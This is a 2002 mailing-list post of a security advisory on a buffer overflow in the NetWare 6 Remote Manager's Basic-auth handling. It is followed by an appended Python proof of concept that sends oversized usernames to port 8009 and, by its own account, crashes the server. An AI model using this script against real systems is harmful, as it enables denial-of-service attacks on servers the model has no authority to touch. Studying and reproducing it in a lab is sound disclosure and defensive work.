iXsecurity.20020313.nw6remotemanager.a

From: Patrik Karlsson (Patrik.Karlssonat_private)
Date: Wed Apr 03 2002 - 04:33:05 PST


    Replying to my own post.... We found Netware 5.1 to be vulnerable to
    the same exposure today.
    
    Regards,
    Patrik Karlsson & Jonas Ländin
    patrik.karlssonat_private
    jonas.landinat_private
    
    
    iXsecurity Security Vulnerability Report
    No: iXsecurity.20020313.nw6remotemanager.a
    ==========================================
    
    Vulnerability Summary
    ---------------------
    Problem:                The Netware 6 Remote Manager, which is a
                            web-based interface for managing the
                            server, has a buffer overflow condition.
    
    Threat:                 An attacker could cause the HTTPSTK.NLM
                            or SERVER.NLM to ABEND, or possibly execute
                            arbitrary code.
    
    Affected Software:      Netware 6 Remote Manager.
    
    Platform:               Netware 6 and Netware 6 SP1.
    
    Solution:               Install the patch for Netware 6 Remote
                            Manager, whenever Novell decides to publish
                            it, or disable the NLM.
    
    Vulnerability Description
    -------------------------
    The Netware 6 Remote Manager listens on port 8009 by default and is
    accessed using an SSL-capable web browser. The NLM handling this
    is HTTPSTK.NLM. The buffer overflow condition occurs when the
    basic authentication fields are supplied with a long username or
    password. Depending on the length of the username and/or password
    supplied, the server will ABEND in either SERVER.NLM or
    HTTPSTK.NLM. The first condition occurs when the server is trying to
    free memory which has been overwritten by the username. E.g. the
    server is trying to free 0x00000041 when the buffer has been
    filled with 595 'A's. This ABEND occurs in SERVER.NLM.
    The second condition is within HTTPSTK.NLM itself and occurs
    in a CMP where the EAX register contains 0x41414141. It is triggered
    by 626 characters. When even more characters (> 1565) are supplied,
    the browser responds with "document contains no data"; however, the
    server does not ABEND. We have not dug deeper into the conditions to
    see if they are exploitable or not.
    
    
    Additional Information
    ----------------------
    Novell was contacted 20020314, however they decided not to reply.
    
    This vulnerability was found by
    Patrik Karlsson & Jonas Ländin
    patrik.karlssonat_private
    jonas.landinat_private
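The requests described in the advisory, as an added example that is not part of the original post or of Novell's software: it builds HTTP requests whose Basic Authentication username has the lengths the advisory reports (595, 626 and more than 1565 characters) so the three observed behaviours can be reproduced one at a time, and decodes the header back out to confirm what will be sent. The host name, the request path `/`, the `HTTP/1.0` request form and the password value are assumptions; the port 8009, the 'A' fill byte and the lengths come from the advisory. Nothing is sent unless a host is given on the command line.

```python
"""Build (and optionally send) the long-username Basic-auth requests from the advisory.

Added example, not the advisory's own code. Assumptions: the Remote Manager
answers on TCP port 8009 over SSL (default per the advisory), the path '/'
reaches the Basic-auth handling, and the stand-in host name below.
"""
import base64
import socket
import ssl

HOST = "netware.example"   # assumption: stand-in host name
PORT = 8009                # default Remote Manager port, per the advisory

# Username lengths reported by the advisory and the effect observed for each.
CASES = {
    "server_nlm_abend": 595,    # server frees 0x00000041 (overwritten pointer) in SERVER.NLM
    "httpstk_nlm_abend": 626,   # CMP with EAX == 0x41414141 inside HTTPSTK.NLM
    "no_abend": 1566,           # > 1565 chars: browser reports "document contains no data"
}


def basic_auth_header(username: str, password: str) -> str:
    """RFC 2617 Basic credentials: 'Basic ' + base64('user:pass')."""
    if ":" in username:
        raise ValueError("a Basic-auth username cannot contain ':'")
    token = base64.b64encode(f"{username}:{password}".encode("latin-1")).decode("ascii")
    return f"Basic {token}"


def build_request(username_len: int, password: str = "x", fill: str = "A", path: str = "/") -> bytes:
    """One HTTP/1.0 GET whose Authorization header carries a username of the given length."""
    username = fill * username_len
    lines = [
        f"GET {path} HTTP/1.0",
        f"Host: {HOST}:{PORT}",
        f"Authorization: {basic_auth_header(username, password)}",
        "Connection: close",
        "",
        "",
    ]
    return "\r\n".join(lines).encode("ascii")


def decode_credentials(request: bytes) -> tuple:
    """Parse the Basic credentials back out of a built request, as (username, password)."""
    for line in request.decode("ascii").split("\r\n"):
        if line.lower().startswith("authorization: basic "):
            raw = base64.b64decode(line.split(" ", 2)[2]).decode("latin-1")
            user, _, pw = raw.partition(":")
            return user, pw
    raise ValueError("no Basic Authorization header in request")


def send_probe(request: bytes, host: str = HOST, port: int = PORT, timeout: float = 5.0) -> bytes:
    """Send one request over TLS and return whatever comes back (empty if the server drops us).

    Certificate checks are disabled because the target is a lab box with a self-signed
    certificate; a 2002-era server may also need an older protocol minimum than the
    default context allows (assumption: adjust ctx.minimum_version if the handshake fails).
    """
    ctx = ssl.create_default_context()
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE
    chunks = []
    with socket.create_connection((host, port), timeout=timeout) as sock:
        with ctx.wrap_socket(sock, server_hostname=host) as tls:
            tls.sendall(request)
            try:
                while True:
                    data = tls.recv(4096)
                    if not data:
                        break
                    chunks.append(data)
            except (socket.timeout, ssl.SSLError, ConnectionResetError):
                pass  # an ABEND shows up as a dropped connection, not as an HTTP error
    return b"".join(chunks)


if __name__ == "__main__":
    import sys
    for name, n in CASES.items():
        req = build_request(n)
        user, _ = decode_credentials(req)
        print(f"{name}: username length {len(user)}, request {len(req)} bytes")
        if len(sys.argv) > 1:  # only talk to a server when a host is given on the command line
            reply = send_probe(req, host=sys.argv[1])
            print("  reply:", reply[:80] if reply else b"<no data: connection closed, check the server console>")
```

Run it with no arguments to see the request sizes; pass a lab host as the first argument to send the three probes in order (expect the first one to take the server down, so the later cases need a fresh boot each). The `password` is kept short on purpose so that the username alone accounts for the length; the advisory says either field can trigger the overflow, so swapping the roles of the two arguments is the obvious second run.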
    



    This archive was generated by hypermail 2b30 : Wed Apr 03 2002 - 17:13:39 PST